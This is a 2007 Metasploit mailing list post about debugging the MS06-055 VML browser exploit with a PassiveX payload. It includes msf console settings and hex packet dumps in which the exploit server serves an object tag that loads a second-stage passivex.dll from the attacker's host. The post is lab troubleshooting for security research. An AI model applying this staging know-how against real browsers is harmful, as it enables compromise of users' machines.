Metasploit mailing list archives
PassiveX-based payloads and MS06-055
From: buffer at softmedia.info (Angelo Dell'Aera)
Date: Fri, 16 Mar 2007 16:30:50 +0100
Il giorno Wed, 14 Mar 2007 23:03:41 -0700 mmiller at hick.org ha scritto:
Hmm, from these logs it looks like it's working. 'p' is set to a proc that is defined in passivex.rb, which is correct. It looks like the text just line-wrapped. Since it says 'Sending PassiveX...', that means that it at least handled the initial request and sent it to the correct page which contains the object tag. However, it looks like the browser didn't attempt to download the control. Do you happen to be running this exploit in a non-administrative account? Internet explorer won't download ActiveX controls as non-admin. Alternatively, can you try browsing to the page hosting PX in Internet Explorer, since it seems like you're getting farther now than before?
Matt, something is moving here but we're not still at the end of the game. I noticed that the problem while handling the PXURI resource was not a real problem but it's worth mentioning. While setting the environment variables, the handling is not correctly done if the / in the PXURI is not properly escaped (and my apologies for this). msf exploit(ms06_055_vml_method) > set URIPATH uripath URIPATH => uripath msf exploit(ms06_055_vml_method) > set PXURI "/pxuri" PXURI => /pxuri Taking a step further there's still no luck in owning the box. Take a look at this please. This happens in the second stage of the exploit when the client is trying to getting PXURI. The browser request... 0x0000: 4500 00f4 0177 4000 8006 3437 c0a8 2183 E....w at ...47..!. 0x0010: c0a8 2182 042b 1f90 0553 dcd2 7073 2c77 ..!..+...S..ps,w 0x0020: 5018 faf0 1ebe 0000 4745 5420 2f70 7875 P.......GET./pxu 0x0030: 7269 2048 5454 502f 312e 310d 0a41 6363 ri.HTTP/1.1..Acc 0x0040: 6570 743a 202a 2f2a 0d0a 4163 6365 7074 ept:.*/*..Accept 0x0050: 2d4c 616e 6775 6167 653a 2069 740d 0a41 -Language:.it..A 0x0060: 6363 6570 742d 456e 636f 6469 6e67 3a20 ccept-Encoding:. 0x0070: 677a 6970 2c20 6465 666c 6174 650d 0a55 gzip,.deflate..U 0x0080: 7365 722d 4167 656e 743a 204d 6f7a 696c ser-Agent:.Mozil 0x0090: 6c61 2f34 2e30 2028 636f 6d70 6174 6962 la/4.0.(compatib 0x00a0: 6c65 3b20 4d53 4945 2036 2e30 3b20 5769 le;.MSIE.6.0;.Wi 0x00b0: 6e64 6f77 7320 4e54 2035 2e31 290d 0a48 ndows.NT.5.1)..H 0x00c0: 6f73 743a 2031 3932 2e31 3638 2e33 332e ost:.192.168.33. 0x00d0: 3133 303a 3830 3830 0d0a 436f 6e6e 6563 130:8080..Connec 0x00e0: 7469 6f6e 3a20 4b65 6570 2d41 6c69 7665 tion:.Keep-Alive 0x00f0: 0d0a 0d0a .... and Metasploit response... 0x0000: 4500 01e2 71de 4000 4006 02e2 c0a8 2182 E...q. at .@.....!. 0x0010: c0a8 2183 1f90 042b 7073 2c77 0553 dd9e ..!....+ps,w.S.. 0x0020: 5018 1920 3b57 0000 4854 5450 2f31 2e31 P...;W..HTTP/1.1 0x0030: 2032 3030 204f 4b0d 0a53 6572 7665 723a .200.OK..Server: 0x0040: 2041 7061 6368 650d 0a43 6f6e 7465 6e74 .Apache..Content 0x0050: 2d54 7970 653a 2074 6578 742f 6874 6d6c -Type:.text/html 0x0060: 0d0a 436f 6e74 656e 742d 4c65 6e67 7468 ..Content-Length 0x0070: 3a20 3333 370d 0a43 6f6e 6e65 6374 696f :.337..Connectio 0x0080: 6e3a 204b 6565 702d 416c 6976 650d 0a0d n:.Keep-Alive... 0x0090: 0a3c 6874 6d6c 3e09 3c6f 626a 6563 7420 .<html>.<object. 0x00a0: 636c 6173 7369 643d 2243 4c53 4944 3a42 classid="CLSID:B 0x00b0: 3341 4337 3330 372d 4645 4145 2d34 6534 3AC7307-FEAE-4e4 0x00c0: 332d 4232 4436 2d31 3631 4536 3841 4241 3-B2D6-161E68ABA 0x00d0: 3833 3822 2063 6f64 6562 6173 653d 222f 838 ".codebase="/ 0x00e0: 7078 7572 692f 7061 7373 6976 6578 2e64 pxuri/passivex.d 0x00f0: 6c6c 232d 312c 2d31 2c2d 312c 2d31 223e ll#-1,-1,-1,-1"> 0x0100: 0909 3c70 6172 616d 206e 616d 653d 2248 ..<param.name="H 0x0110: 7474 7048 6f73 7422 2076 616c 7565 3d22 ttpHost".value=" 0x0120: 3139 322e 3136 382e 3333 2e31 3330 223e 192.168.33.130"> 0x0130: 0909 3c70 6172 616d 206e 616d 653d 2248 ..<param.name="H 0x0140: 7474 7050 6f72 7422 2076 616c 7565 3d22 ttpPort".value=" 0x0150: 3830 3830 223e 0909 3c70 6172 616d 206e 8080">..<param.n 0x0160: 616d 653d 2248 7474 7055 7269 4261 7365 ame="HttpUriBase 0x0170: 2220 7661 6c75 653d 222f 7078 7572 6922 ".value="/pxuri" 0x0180: 3e09 093c 7061 7261 6d20 6e61 6d65 3d22 >..<param.name=" 0x0190: 4874 7470 5369 6422 2076 616c 7565 3d22 HttpSid".value=" 0x01a0: 3222 3e09 093c 7061 7261 6d20 6e61 6d65 2">..<param.name 0x01b0: 3d22 446f 776e 6c6f 6164 5365 636f 6e64 ="DownloadSecond 0x01c0: 5374 6167 6522 2076 616c 7565 3d22 3122 Stage".value="1" 0x01d0: 3e09 3c2f 6f62 6a65 6374 3e3c 2f68 746d >.</object></htm 0x01e0: 6c3e l> followed by a FIN/ACK which is then ACKed by the browser. After this nothing else. Everything seems correct at a first glance but IE doesn't go on in downloading the ActiveX control. FYI answering to the question in your reply I'm running this exploit as Administrator. I even tried disabling any kind of protection against ActiveX downloading and executing in every Internet Zone but still nothing. Regards, -- Angelo Dell'Aera 'buffer' Antifork Research, Inc. http://buffer.antifork.org Metro Olografix PGP information in e-mail header -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070316/486c8af5/attachment.pgp>
Current thread:
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 14)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 14)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 16)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)